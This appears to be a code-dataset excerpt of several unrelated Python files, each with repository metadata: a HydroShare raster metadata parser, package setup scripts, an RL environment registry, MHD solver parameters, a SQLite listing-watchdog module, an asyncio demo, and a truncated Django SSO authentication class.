2017-07-27T20:41:33.000Z
|
2017-07-27T22:40:57.000Z
|
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
"""
Lightweight class for representing metadata of RasterResource instances.
"""
def __init__(self):
super(RasterResourceMeta, self).__init__()
self.cell_info = None
self.band_info = []
self.spatial_reference = None
def _read_resource_metadata(self):
super(RasterResourceMeta, self)._read_resource_metadata()
print("--- RasterResourceMeta ---")
# Also parse using SAX so that we can capture certain metadata elements
# in the same order in which they appear in the RDF+XML serialization.
SAX_parse_results = RasterResourceSAXHandler()
xml.sax.parse(self.rmeta_path, SAX_parse_results)
hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
# Get CellInformation
for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
self.cell_info = RasterResourceMeta.CellInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for CellInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.name = str(name_lit)
# Get rows
rows_lit = self._rmeta_graph.value(o, hsterms.rows)
if rows_lit is None:
msg = "Rows attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.rows = int(str(rows_lit))
# Get columns
columns_lit = self._rmeta_graph.value(o, hsterms.columns)
if columns_lit is None:
msg = "Columns attribute was not found for CellInformation for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.columns = int(str(columns_lit))
# Get cellSizeXValue
cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
if cellX_lit is None:
msg = "cellSizeXValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeXValue = float(str(cellX_lit))
# Get cellSizeYValue
cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
if cellY_lit is None:
msg = "cellSizeYValue attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellSizeYValue = float(str(cellY_lit))
# Get cellDataType
celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
if celldt_lit is None:
msg = "cellDataType attribute was not found for CellInformation "
msg += "for resource {0}"
msg = msg.format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
self.cell_info.cellDataType = str(celldt_lit)
# Get noDataValue
nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
if nodata_lit is not None:
self.cell_info.noDataValue = float(str(nodata_lit))
print("\t\t{0}".format(self.cell_info))
# Get BandInformation
if SAX_parse_results:
# Use band info from SAX parser
self.band_info = list(SAX_parse_results.band_info)
else:
# Get band info from RDF
for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
band_info = RasterResourceMeta.BandInformation()
# Get name
name_lit = self._rmeta_graph.value(o, hsterms.name)
if name_lit is None:
msg = "Name for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.name = str(name_lit)
# Get variableName
varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
if varname_lit is None:
msg = "variableName for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableName = str(varname_lit)
# Get variableUnit
varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
if varunit_lit is None:
msg = "variableUnit for BandInformation was not found for resource {0}".\
format(self.root_uri)
raise GenericResourceMeta.ResourceMetaException(msg)
band_info.variableUnit = str(varunit_lit)
# Get method
method_lit = self._rmeta_graph.value(o, hsterms.method)
if method_lit is not None:
band_info.method = str(method_lit)
# Get comment
comment_lit = self._rmeta_graph.value(o, hsterms.comment)
if comment_lit is not None:
band_info.comment = str(comment_lit)
self.band_info.append(band_info)
for b in self.band_info:
print("\t\t{0}".format(str(b)))
# Get spatialReference
for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
if spat_ref_lit is None:
msg = "Spatial reference value not found for {0}.".format(o)
raise GenericResourceMeta.ResourceMetaException(msg)
self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
print("\t\t{0}".format(self.spatial_reference))
@transaction.atomic
def write_metadata_to_resource(self, resource):
"""
Write metadata to resource
:param resource: RasterResource instance
"""
super(RasterResourceMeta, self).write_metadata_to_resource(resource)
if self.cell_info:
resource.metadata.cellInformation.delete()
resource.metadata.create_element('CellInformation', name=self.cell_info.name,
rows=self.cell_info.rows,
columns=self.cell_info.columns,
cellSizeXValue=self.cell_info.cellSizeXValue,
cellSizeYValue=self.cell_info.cellSizeYValue,
cellDataType=self.cell_info.cellDataType,
noDataValue=self.cell_info.noDataValue)
if len(self.band_info) > 0:
for band in resource.metadata.bandInformation:
band.delete()
for b in self.band_info:
resource.metadata.create_element('BandInformation', name=b.name,
variableName=b.variableName,
variableUnit=b.variableUnit, method=b.method,
comment=b.comment)
if self.spatial_reference:
resource.metadata.originalCoverage.delete()
values = {'units': self.spatial_reference.units,
'northlimit': self.spatial_reference.northlimit,
'eastlimit': self.spatial_reference.eastlimit,
'southlimit': self.spatial_reference.southlimit,
'westlimit': self.spatial_reference.westlimit,
'projection': self.spatial_reference.projection}
kwargs = {'value': values}
resource.metadata.create_element('OriginalCoverage', **kwargs)
class CellInformation(object):
def __init__(self):
self.name = None
self.rows = None
self.columns = None
self.cellSizeXValue = None
self.cellSizeYValue = None
self.cellDataType = None
self.noDataValue = None # Optional
def __str__(self):
msg = "CellInformation name: {name}, "
msg += "rows: {rows}, columns: {columns}, "
msg += "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
msg += "cellDataType: {cellDataType}, noDataValue: {noDataValue}"
msg = msg.format(name=self.name, rows=self.rows,
columns=self.columns, cellSizeXValue=self.cellSizeXValue,
cellSizeYValue=self.cellSizeYValue, cellDataType=self.cellDataType,
noDataValue=self.noDataValue)
return msg
def __unicode__(self):
return unicode(str(self))
class BandInformation(object):
def __init__(self):
self.name = None
self.variableName = None
self.variableUnit = None
self.method = None # Optional
self.comment = None # Optional
def __str__(self):
msg = "BandInformation name: {name}, "
msg += "variableName: {variableName}, variableUnit: {variableUnit}, "
msg += "method: {method}, comment: {comment}"
msg = msg.format(name=self.name, variableName=self.variableName,
variableUnit=self.variableUnit, method=self.method,
comment=self.comment)
return msg
def __unicode__(self):
return unicode(str(self))
class SpatialReference(object):
def __init__(self):
self.northlimit = None
self.eastlimit = None
self.southlimit = None
self.westlimit = None
self.units = None
self.projection = None # Optional
def __str__(self):
msg = "SpatialReference northlimit: {northlimit}, "
msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
southlimit=self.southlimit, westlimit=self.westlimit,
units=self.units, projection=self.projection)
return msg
def __unicode__(self):
return unicode(str(self))
def __init__(self, value_str):
kvp = value_str.split(';')
for pair in kvp:
(key, value) = pair.split('=')
key = key.strip()
value = value.strip()
if key == 'name':
self.name = value
elif key == 'eastlimit':
try:
self.eastlimit = float(value)
except Exception as e:
msg = "Unable to parse east limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'northlimit':
try:
self.northlimit = float(value)
except Exception as e:
msg = "Unable to parse north limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'southlimit':
try:
self.southlimit = float(value)
except Exception as e:
msg = "Unable to parse south limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'westlimit':
try:
self.westlimit = float(value)
except Exception as e:
msg = "Unable to parse west limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'units':
self.units = value
elif key == 'projection':
self.projection = value
class RasterResourceSAXHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
# Content
self.band_info = []
# State variables
self._get_bandinfo = False
self._get_bandinfo_details = False
self._get_bandinfo_name = False
self._bandinfo_name = None
self._get_bandinfo_var_name = False
self._bandinfo_var_name = None
self._get_bandinfo_var_unit = False
self._bandinfo_var_unit = None
self._get_bandinfo_method = False
self._bandinfo_method = None
self._get_bandinfo_comment = False
self._bandinfo_comment = None
def characters(self, content):
if self._get_bandinfo_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information name."
raise xml.sax.SAXException(msg)
self._bandinfo_name.append(content)
elif self._get_bandinfo_var_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable name."
raise xml.sax.SAXException(msg)
self._bandinfo_var_name.append(content)
elif self._get_bandinfo_var_unit:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable unit."
raise xml.sax.SAXException(msg)
self._bandinfo_var_unit.append(content)
elif self._get_bandinfo_method:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information method."
raise xml.sax.SAXException(msg)
self._bandinfo_method.append(content)
elif self._get_bandinfo_comment:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information comment."
raise xml.sax.SAXException(msg)
self._bandinfo_comment.append(content)
def startElement(self, name, attrs):
if name == 'hsterms:BandInformation':
if self._get_bandinfo:
raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
self._get_bandinfo = True
elif name == 'rdf:Description':
if self._get_bandinfo:
if self._get_bandinfo_details:
msg = "Error: nested rdf:Description elements " \
"within hsterms:BandInformation element."
raise xml.sax.SAXException(msg)
# Create new band info
self.band_info.append(RasterResourceMeta.BandInformation())
self._get_bandinfo_details = True
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if self._get_bandinfo_name:
raise xml.sax.SAXException("Error: nested hsterms:name elements "
"within hsterms:BandInformation.")
self._get_bandinfo_name = True
self._bandinfo_name = []
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if self._get_bandinfo_var_name:
raise xml.sax.SAXException("Error: nested hsterms:variableName elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_name = True
self._bandinfo_var_name = []
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if self._get_bandinfo_var_unit:
raise xml.sax.SAXException("Error: nested hsterms:variableUnit elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_unit = True
self._bandinfo_var_unit = []
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if self._get_bandinfo_method:
raise xml.sax.SAXException("Error: nested hsterms:method elements "
"within hsterms:BandInformation.")
self._get_bandinfo_method = True
self._bandinfo_method = []
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if self._get_bandinfo_comment:
raise xml.sax.SAXException("Error: nested hsterms:comment elements "
"within hsterms:BandInformation.")
self._get_bandinfo_comment = True
self._bandinfo_comment = []
def endElement(self, name):
if name == 'hsterms:BandInformation':
if not self._get_bandinfo:
msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
raise xml.sax.SAXException(msg)
self._get_bandinfo = False
elif name == 'rdf:Description':
if self._get_bandinfo:
if not self._get_bandinfo_details:
msg = "Error: close rdf:Description tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self._get_bandinfo_details = False
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if not self._get_bandinfo_name:
msg = "Error: close hsterms:name tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].name = "".join(self._bandinfo_name)
self._bandinfo_name = None
self._get_bandinfo_name = False
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_name:
msg = "Error: close hsterms:variableName tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableName = "".join(self._bandinfo_var_name)
self._bandinfo_var_name = None
self._get_bandinfo_var_name = False
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_unit:
msg = "Error: close hsterms:variableUnit tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableUnit = "".join(self._bandinfo_var_unit)
self._bandinfo_var_unit = None
self._get_bandinfo_var_unit = False
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if not self._get_bandinfo_method:
msg = "Error: close hsterms:method tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].method = "".join(self._bandinfo_method)
self._bandinfo_method = None
self._get_bandinfo_method = False
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if not self._get_bandinfo_comment:
msg = "Error: close hsterms:comment tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].comment = "".join(self._bandinfo_comment)
self._bandinfo_comment = None
self._get_bandinfo_comment = False
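# --- Editor's note --------------------------------------------------------
# Standalone sketch (not part of the original module) of the rdflib lookup
# pattern used throughout _read_resource_metadata: iterate the triples for a
# given predicate, then pull individual literals off the object node with
# graph.value().  The tiny in-memory graph below is made up for illustration.
import rdflib

_hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
_g = rdflib.Graph()
_cell = rdflib.BNode()
_g.add((rdflib.URIRef('http://example.org/resource'), _hsterms.CellInformation, _cell))
_g.add((_cell, _hsterms.rows, rdflib.Literal(100)))
_g.add((_cell, _hsterms.columns, rdflib.Literal(200)))

for _s, _p, _o in _g.triples((None, _hsterms.CellInformation, None)):
    rows = int(str(_g.value(_o, _hsterms.rows)))
    columns = int(str(_g.value(_o, _hsterms.columns)))
    print(rows, columns)
# ---------------------------------------------------------------------------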
| 47.215217
| 97
| 0.55776
| 21,594
| 0.994245
| 0
| 0
| 2,033
| 0.093605
| 0
| 0
| 4,285
| 0.197293
|
c410261f2af66c058c52c7122ed945e7bc1bf8e8
| 857
|
py
|
Python
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | 5
|
2019-01-15T12:31:49.000Z
|
2021-03-05T21:17:13.000Z
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | 1
|
2019-06-18T20:58:21.000Z
|
2019-06-18T20:58:21.000Z
|
setup.py
|
mrocklin/pygdf
|
2de9407427da9497ebdf8951a12857be0fab31bb
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
import versioneer
packages = ['pygdf',
'pygdf.tests',
]
install_requires = [
'numba',
]
setup(name='pygdf',
description="GPU Dataframe",
version=versioneer.get_version(),
classifiers=[
# "Development Status :: 4 - Beta",
"Intended Audience :: Developers",
# "Operating System :: OS Independent",
"Programming Language :: Python",
# "Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.5",
],
# Include the separately-compiled shared library
author="Continuum Analytics, Inc.",
packages=packages,
package_data={
'pygdf.tests': ['data/*.pickle'],
},
install_requires=install_requires,
license="BSD",
cmdclass=versioneer.get_cmdclass(),
)
| 24.485714
| 54
| 0.588098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.439907
|
c412a68b17b363d84e8cdaf62f22ff38191fc6e5
| 335
|
py
|
Python
|
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
pymarl/envs/__init__.py
|
twoodford/pymarl
|
c78e63e54ed772171fbcaea6c55c703cff0e9302
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
from .multiagentenv import MultiAgentEnv
import sys
import os
def env_fn(env, **kwargs) -> MultiAgentEnv:
return env(**kwargs)
REGISTRY = {}
#REGISTRY["sc2"] = partial(env_fn, env=StarCraft2Env)
def register_env(nm, env_class):
global REGISTRY
REGISTRY[nm] = partial(env_fn, env=env_class)
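# --- Editor's note --------------------------------------------------------
# Hypothetical usage sketch (not in the original file): registering and
# instantiating an environment through the REGISTRY factory.  DummyEnv and
# its n_agents argument are made up; a real environment would implement the
# full MultiAgentEnv interface (step, reset, etc.).
class DummyEnv(MultiAgentEnv):
    def __init__(self, n_agents=2, **kwargs):
        self.n_agents = n_agents

register_env("dummy", DummyEnv)
dummy = REGISTRY["dummy"](n_agents=4)   # -> DummyEnv instance with 4 agents
# ---------------------------------------------------------------------------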
| 22.333333
| 53
| 0.740299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 53
| 0.158209
|
c415cf0f1a05df7a1ed0253bc2693cc05cb80cc0
| 4,938
|
py
|
Python
|
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | 1
|
2019-03-04T15:38:01.000Z
|
2019-03-04T15:38:01.000Z
|
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | null | null | null |
gumtree_watchdog/db.py
|
undeadparrot/gumtree-telegram-watchdog
|
48db6b37876c520bd5d2e0f9a97e19b04d70e12f
|
[
"MIT"
] | null | null | null |
import os
import os.path
import sqlite3
import logging
from typing import List
from gumtree_watchdog.types import Listing, Contract, ListingWithChatId
TConn = sqlite3.Connection
DB_PATH = os.environ.get('GUMTREE_DB')
def get_connection() -> TConn:
if not DB_PATH:
raise Exception("Please specify Sqlite3 db path as environment variable GUMTREE_DB")
conn = sqlite3.connect(DB_PATH)
conn.row_factory = sqlite3.Row
return conn
def initialize():
if os.path.isfile(DB_PATH):
logging.info("Sqlite3 database found.")
return
logging.warning("Sqlite3 database not found, will initialize.")
with get_connection() as conn:
conn.execute("""
CREATE TABLE contract(
contract_id integer primary key autoincrement,
query text not null,
chat_id integer not null,
is_active bool default 0,
UNIQUE(chat_id, query)
);
""")
conn.execute("""
CREATE TABLE listing(
listing_id integer primary key autoincrement,
contract_id integer not null,
ad_id text not null,
title text not null,
description text not null,
url text,
must_notify_user bool default 1,
FOREIGN KEY(contract_id) REFERENCES contract(contract_id),
UNIQUE(contract_id, ad_id)
);
""")
conn.execute("""
CREATE TABLE inbound_msg(
inbound_msg_id integer primary key autoincrement,
chat_id integer not null,
message text not null
);
""")
def insert_inbound_msg(conn: TConn, chat_id: int, message: str):
conn.execute("""
INSERT INTO inbound_msg (chat_id, message) VALUES (:chat_id, :message)
""", dict(
chat_id=chat_id,
message=message
))
def insert_contract(conn: TConn, chat_id: int, query: str) -> int:
cur = conn.cursor()
cur.execute("""
INSERT INTO contract (chat_id, query) VALUES (:chat_id, :query)
""", dict(
chat_id=chat_id,
query=query
))
return cur.lastrowid
def insert_listing(conn: TConn, record: Listing) -> bool:
existing_results = conn.execute("""
SELECT listing_id
FROM listing
WHERE contract_id = :contract_id AND ad_id = :ad_id
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id
)).fetchall()
if existing_results:
return False
conn.execute("""
INSERT INTO listing
(contract_id, ad_id, url, title, description)
VALUES
(:contract_id, :ad_id, :url,:title, :description)
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id,
url=record.url,
title=record.title,
description=record.description
))
return True
def get_open_contracts(conn: TConn) -> List[Contract]:
results = conn.execute("""
SELECT * FROM contract WHERE is_active = 1;
""").fetchall()
return [Contract(**_) for _ in results]
def get_open_contracts_for_user(conn: TConn, chat_id: int) -> List[Contract]:
results = conn.execute("""
SELECT *
FROM contract
WHERE is_active = 1
AND chat_id = :chat_id
""", dict(
chat_id=chat_id
)).fetchall()
return [Contract(**_) for _ in results]
def get_unsent_listing_notifications(conn: TConn) -> List[ListingWithChatId]:
results = conn.execute("""
SELECT listing_id, ad_id, chat_id, url, title, description
FROM listing
JOIN contract USING (contract_id)
WHERE must_notify_user = 1
AND contract.is_active = 1
""").fetchall()
return [ListingWithChatId(**_) for _ in results]
def mark_listing_as_sent(conn: TConn, listing_id: int):
return conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE listing_id = :listing_id
""", dict(listing_id=listing_id))
def deactivate_contract(conn: TConn, chat_id: str, contract_id: int):
conn.execute("""
UPDATE contract
SET is_active = 0
WHERE contract_id = :contract_id
AND chat_id = :chat_id
""", dict(contract_id=contract_id, chat_id=chat_id))
def mark_contract_active(conn: TConn, contract_id: int):
conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
conn.execute("""
UPDATE contract
SET is_active = 1 WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
| 28.37931
| 92
| 0.584447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,636
| 0.533819
|
c4184af48713ebd40a957015c82bc531d4f8d4b7
| 3,601
|
py
|
Python
|
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
apps/1d/mhd/shock_tube/this_app_params.py
|
dcseal/finess
|
766e583ae9e84480640c7c3b3c157bf40ab87fe4
|
[
"BSD-3-Clause"
] | null | null | null |
#section [initial]
def _parameters_accessors_checks():
from finess.params import Parameter, Accessor, Check, \
CheckGreaterEqual, CheckGreaterThan, \
CheckOneOf, EnumParameterType
parameters = []
checks = []
rhol = Parameter(variable_name = "rhol",
section = "initial",
name = "rhol",
type_ = "double")
parameters.append(rhol)
checks.append(CheckGreaterThan(rhol, 0.0))
unl = Parameter(variable_name = "unl",
section = "initial",
name = "unl",
type_ = "double")
parameters.append(unl)
utl = Parameter(variable_name = "utl",
section = "initial",
name = "utl",
type_ = "double")
parameters.append(utl)
u3l = Parameter(variable_name = "u3l",
section = "initial",
name = "u3l",
type_ = "double")
parameters.append(u3l)
pl = Parameter(variable_name = "pl",
section = "initial",
name = "pl",
type_ = "double")
parameters.append(pl)
checks.append(CheckGreaterThan(pl, 0.0))
Bnl = Parameter(variable_name = "Bnl",
section = "initial",
name = "Bnl",
type_ = "double")
parameters.append(Bnl)
Btl = Parameter(variable_name = "Btl",
section = "initial",
name = "Btl",
type_ = "double")
parameters.append(Btl)
B3l = Parameter(variable_name = "B3l",
section = "initial",
name = "B3l",
type_ = "double")
parameters.append(B3l)
rhor = Parameter(variable_name = "rhor",
section = "initial",
name = "rhor",
type_ = "double")
parameters.append(rhor)
checks.append(CheckGreaterThan(rhor, 0.0))
unr = Parameter(variable_name = "unr",
section = "initial",
name = "unr",
type_ = "double")
parameters.append(unr)
utr = Parameter(variable_name = "utr",
section = "initial",
name = "utr",
type_ = "double")
parameters.append(utr)
u3r = Parameter(variable_name = "u3r",
section = "initial",
name = "u3r",
type_ = "double")
parameters.append(u3r)
pr = Parameter(variable_name = "pr",
section = "initial",
name = "pr",
type_ = "double")
parameters.append(pr)
checks.append(CheckGreaterThan(pr, 0.0))
Bnr = Parameter(variable_name = "Bnr",
section = "initial",
name = "Bnr",
type_ = "double")
parameters.append(Bnr)
Btr = Parameter(variable_name = "Btr",
section = "initial",
name = "Btr",
type_ = "double")
parameters.append(Btr)
B3r = Parameter(variable_name = "B3r",
section = "initial",
name = "B3r",
type_ = "double")
parameters.append(B3r)
return parameters, list(map(Accessor, parameters)), checks  # list() keeps accessor_list a real list under Python 3
parameter_list, accessor_list, check_list = \
_parameters_accessors_checks()
| 31.587719
| 68
| 0.463482
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 450
| 0.124965
|
c418d7e5abef02bb7493320d6cd67da6e01f6114
| 1,142
|
py
|
Python
|
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
async-functions.py
|
cheezyy/python_scripts
|
9db713ca085c6f1fd5ec63d79762a470093e028a
|
[
"MIT"
] | null | null | null |
'''
Chad Meadowcroft
Credit to Sentdex (https://pythonprogramming.net/)
'''
import asyncio
async def find_divisibles(inrange, div_by):
# Find all numbers in range(inrange) divisible by div_by, periodically yielding to the event loop
print("finding nums in range {} divisible by {}".format(inrange, div_by))
located = []
for i in range(inrange):
if i % div_by == 0:
located.append(i)
if i % 50000 == 0:
await asyncio.sleep(0.00001)
print("Done w/ nums in range {} divisible by {}".format(inrange, div_by))
return located
async def main():
# Example functions to run concurrently
divs1 = loop.create_task(find_divisibles(508000, 34113))
divs2 = loop.create_task(find_divisibles(10052, 3210))
divs3 = loop.create_task(find_divisibles(500, 3))
# Activate async operation
await asyncio.wait([divs1, divs2, divs3])
return divs1, divs2, divs3
if __name__ == '__main__':
try:
loop = asyncio.get_event_loop()
loop.set_debug(1)
d1, d2, d3 = loop.run_until_complete(main())
print(d1.result())
except Exception as e:
pass
finally:
loop.close()
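# --- Editor's note --------------------------------------------------------
# Standalone sketch (not part of the original script): on Python 3.7+ the
# same concurrency can be expressed with asyncio.gather and asyncio.run,
# avoiding manual event-loop management.
async def _main_alt():
    return await asyncio.gather(
        find_divisibles(508000, 34113),
        find_divisibles(10052, 3210),
        find_divisibles(500, 3),
    )

# asyncio.run(_main_alt())   # left commented so the original __main__ block above stays in charge
# ---------------------------------------------------------------------------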
| 29.282051
| 77
| 0.645359
| 0
| 0
| 0
| 0
| 0
| 0
| 790
| 0.691769
| 285
| 0.249562
|
c41996b81d3533341a720d569e52c1e49f5c467b
| 1,114
|
py
|
Python
|
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | 2
|
2021-04-06T08:37:41.000Z
|
2022-01-07T09:15:25.000Z
|
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | null | null | null |
setup.py
|
jackaraz/ma5_expert
|
4d359b5110874c2f44f81e10307bd1ea3f9e20d0
|
[
"MIT"
] | null | null | null |
from setuptools import setup
import os
with open("README.md", "r", encoding="utf-8") as f:
long_description = f.read()
requirements = []
if os.path.isfile("./requirements.txt"):
with open("requirements.txt", "r") as f:
requirements = f.read()
requirements = [x for x in requirements.split("\n") if x != ""]
setup(
name="ma5_expert",
version="0.0.1",
description=("MadAnalysis 5 interpreter for Expert mode"),
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jackaraz/ma5_expert",
author="Jack Y. Araz",
author_email=("jack.araz@durham.ac.uk"),
license="MIT",
packages=[
"ma5_expert",
"ma5_expert.CutFlow",
"ma5_expert.tools",
],
install_requires=requirements,
python_requires=">=3.6",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Physics",
],
)
| 29.315789
| 67
| 0.630162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 481
| 0.431777
|
c41a92320c98d0d79eebb92f7c12dfc1830b9325
| 4,977
|
py
|
Python
|
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | 3
|
2020-06-06T01:57:41.000Z
|
2021-06-10T22:57:58.000Z
|
apitest/api_test/common/auth.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework.authentication import BaseAuthentication
from rest_framework import exceptions
from rest_framework.parsers import JSONParser
from django.conf import settings
import requests
from api_test.common import MD5
from api_test.models import ProjectMember
from django.contrib.auth.models import User,Group
from rest_framework.authtoken.models import Token
ssoLogin=settings.SSO_LOGIN
ssoClientId=settings.SSO_CLIENTID
ssoClientSecret=settings.SSO_CLIENTSECRET
ssoRedirectUrl=settings.SSO_REDIRECTURL
ssoNotifyUrl=settings.SSO_NOTIFYURL
ssoGetTicketUrl=settings.SSO_GETTICKETURL
# URL for validating SSO tickets/tokens
ssoValidateUrl=settings.SSO_VALIDATEURL
ssoLoginUrl=settings.SSO_LOGINURL
ssoLogoutUrl=settings.SSO_LOGOUTURL
class Dict(dict):
__setattr__ = dict.__setitem__
__getattr__ = dict.__getitem__
def dict_to_object(dictObj):
if not isinstance(dictObj, dict):
return dictObj
inst=Dict()
for k,v in dictObj.items():
inst[k] = dict_to_object(v)
return inst
class TokenAuthentication(BaseAuthentication):
'''Authentication class'''
def authenticate(self, request):
ticket = request.META.get('HTTP_AUTHORIZATION')
if ticket:
if ssoLogin:
params={"cmd":"80010002","data":{"ticket":ticket,"client_secret":ssoClientSecret,"secret_key":MD5.encrypt("%s-%s" % (ticket,ssoClientSecret))}}
response=requests.post(url=ssoValidateUrl,json=params).json()
if response["code"]==0:
user_id=response["data"]["identifier"]
expire=response["data"]["expire"]
